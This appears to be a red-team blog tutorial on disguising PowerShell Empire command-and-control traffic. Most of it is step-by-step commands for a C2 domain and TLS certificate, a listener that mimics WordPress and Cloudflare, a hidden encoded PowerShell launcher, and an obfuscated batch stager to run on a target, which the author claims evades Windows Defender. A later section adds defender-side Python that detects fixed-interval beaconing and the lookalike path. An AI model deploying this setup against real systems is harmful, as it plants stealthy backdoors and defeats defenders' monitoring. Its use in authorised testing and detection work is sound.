RED TEAM TUTORIALS — №2

Encrypting Empire traffic

Crypt0jan
3 min read · May 30, 2021
Photo by Markus Winkler via Unsplash.com

TOPICS

  1. Register a domain
  2. Letsencrypt
  3. Empire Magic

GO THE EXTRA MILE

Stop being lazy. Stop using the default options that come with your favourite hacking tools. To avoid detection, you need to play smart, because, believe it or not, Hunters (or: Blue Teamers) are becoming smarter every day.

In this tutorial, I will not only focus on the (proper) use of SSL but will also show you some of the options that need changing to avoid detection. The options I set are in no way exhaustive; they merely show that the defaults are easily fingerprintable. So, go the extra mile!

I trust that you know how to set up an Empire listener by now. If this is new to you, follow this tutorial first to get familiar with PowerShell Empire.

1. Register a domain

First, register a domain for your C2 server or create a subdomain on an existing domain. This is not only a mandatory step for a valid SSL certificate, but it also allows you to move your C2 infrastructure to another hosting company or IP address. With just one DNS update, all of your backdoors will be able to find your C2 server.

2. Use LetsEncrypt to create an SSL certificate

To avoid detection because of fingerprintable SSL certificates, you should create your own custom SSL certificates. Luckily, that's where LetsEncrypt comes in: a nonprofit Certificate Authority that provides TLS certificates to 260 million websites for free (!).

  • Go to certbot.eff.org
  • For software, choose None of the above
  • For system, choose your OS. In my case: Ubuntu 20.04
  • Follow the instructions to install Certbot on your C2 server
  • Then, request a certificate using the --standalone option:
    # certbot certonly --standalone -d YOURDOMAINHERE
  • If everything went okay, your certificate should be in this directory: /etc/letsencrypt/live/YOURDOMAINHERE

To make this brand new certificate ready for Empire, follow these few easy steps:

  • Create a directory to save the new certificate in:
    # mkdir /opt/ssl
  • Symlink LetsEncrypt's fullchain into the new directory, using Empire's naming convention:
    # ln -s /etc/letsencrypt/live/YOURDOMAINHERE/fullchain.pem /opt/ssl/empire-chain.pem
  • Symlink LetsEncrypt's privkey into the new directory, again using Empire's naming convention:
    # ln -s /etc/letsencrypt/live/YOURDOMAINHERE/privkey.pem /opt/ssl/empire-priv.key

SIDENOTE

You could increase your OpSec by using Cloudflare instead of LetsEncrypt. The downside is that you can only use WEB ports for your C2 connections because Cloudflare only forwards WEB traffic to your IP address.

3. Empire Magic

No issues so far? Good! Let's continue…

Using a proper SSL certificate is not the only thing you’ll need to evade the Hunters. Below, you’ll see me change some default options to limit the risk of any detection rules going off. Start Empire and issue the following commands:

listeners
uselistener http
set Name http
set Host https://YOURDOMAINHERE:443
set Port 443
set Launcher powershell.exe -nop -w hidden -e
set DefaultProfile /wp_includes/microsoft.php|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36|Accept:*/*
set CertPath /opt/ssl/
set Headers Server:cloudflare
set UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
execute

After that, set up the stager:

listeners
usestager windows/launcher_bat
set Listener http
set Obfuscate True
set ObfuscateCommand Token\String\1,1,2,1, Token\Variable\1
set UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
set AMSIBypass False
execute

If you set the OutFile option, the output is written to the file named there (default: /tmp/launcher.bat). Just copy the file (or its contents) to your target and double-click it to launch your backdoor.

That’s it! This should have evaded Windows Defender and most antivirus software. Good job!
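The profile above replaces fingerprintable defaults, but the implant still calls home on a rhythm. As an added defender-side example (not part of the original post and not Empire code), the following parses a constructed web-proxy log and flags any (client, host, path) triple that is polled at a near-fixed interval, and it checks the lure path: real WordPress serves from /wp-includes/ with a hyphen, so the underscore variant stands out. The log format, host names and thresholds are assumptions.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log (not from the original post): timestamp, client, host,
# method, path, user-agent. Lines 3-7 show one host being polled about every 60 s.
SAMPLE_LOG = """\
2021-05-30T10:00:00 10.0.0.5 blog.example.test GET /wp-includes/js/jquery.js "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2021-05-30T10:00:07 10.0.0.5 blog.example.test GET /wp-includes/css/style.css "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2021-05-30T10:01:00 10.0.0.5 c2.example.test GET /wp_includes/microsoft.php "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2021-05-30T10:02:00 10.0.0.5 c2.example.test GET /wp_includes/microsoft.php "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2021-05-30T10:03:01 10.0.0.5 c2.example.test GET /wp_includes/microsoft.php "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2021-05-30T10:04:00 10.0.0.5 c2.example.test GET /wp_includes/microsoft.php "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2021-05-30T10:05:00 10.0.0.5 c2.example.test GET /wp_includes/microsoft.php "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2021-05-30T10:09:30 10.0.0.5 blog.example.test GET /index.php "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) ([A-Z]+) (\S+) "([^"]*)"$')

def parse(log):
    """Yield (datetime, client, host, path) for each well-formed line; skip the rest."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, client, host, _method, path, _ua = m.groups()
            yield datetime.fromisoformat(ts), client, host, path

def find_beacons(log, min_hits=4, max_jitter=0.05):
    """Return {(client, host, path): mean gap in seconds} for near-fixed-interval pollers."""
    times = defaultdict(list)
    for ts, client, host, path in parse(log):
        times[(client, host, path)].append(ts)
    hits = {}
    for key, ts_list in times.items():
        if len(ts_list) < min_hits:
            continue
        ts_list.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(ts_list, ts_list[1:])]
        mean = statistics.mean(gaps)
        # Coefficient of variation close to 0 means a fixed-delay poll loop, not a human.
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter:
            hits[key] = mean
    return hits

def odd_wordpress_path(path):
    """WordPress uses /wp-includes/ (hyphen); an underscore spelling is a lookalike, not WordPress."""
    return path.startswith("/wp_includes/")
```

Realistic tuning needs a longer window and a jitter threshold chosen against your own proxy data, since some legitimate agents also poll on a timer.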

RED TEAM TUTORIALS

With the ongoing shift from Red Teaming to Purple Teaming, Hunters (or: Blue Teamers) are becoming smarter at spotting and countering attacks from Hackers. The reason? Hackers and Hunters are finally learning from each other.

This tutorial is one of a few, written for Hackers to better hide your backdoors from Hunters. Check out my Medium page for more Red Team tutorials.


Crypt0jan

Offensive Security Researcher. I capture flag and escape containers.